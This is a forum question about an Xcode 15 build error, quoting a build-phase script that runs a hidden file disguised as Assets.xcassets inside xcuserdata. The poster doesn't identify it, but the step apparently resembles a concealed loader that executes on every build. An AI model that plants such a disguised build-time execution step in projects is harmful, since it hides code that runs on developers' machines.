# Xcode 15 build error: ...Assets.xcassets: No such file or directory, Command PhaseScriptExecution failed with a nonzero exit code

Tags: xcode

At a loss here, I have researched this and tried everything I've found online and I cannot clear this error for this app and get it to build.

> /Users/{USER}/Library/Developer/Xcode/DerivedData/Conekto-cztflqpisrxpiybiglhmjuvwvreg/Build/Intermediates.noindex/Conekto.build/Debug-iphonesimulator/Conekto.build/Script-0A21ACDEF71C6E8236AAC43A.sh:
> line 4:
> /Users/{USER}/Desktop/lianeuser_ios/Conekto.xcodeproj/xcuserdata/.xcassets/Assets.xcassets:
> No such file or directory
> Command PhaseScriptExecution failed with a nonzero exit code

If I open that script, I see this

```
#!/bin/sh
# This output is used by Xcode outputs to avoid re-running this script phase.

"${PROJECT_FILE_PATH}/xcuserdata/.xcassets/Assets.xcassets" false
```

I found the same thing under Project > Targets > Build Phases > Compile Binary Libraries

Anyone have any idea what could be going on here?  I haven't found anything helpful.

Thanks!

Comment: I am also facing the same issue, have you resolved it ?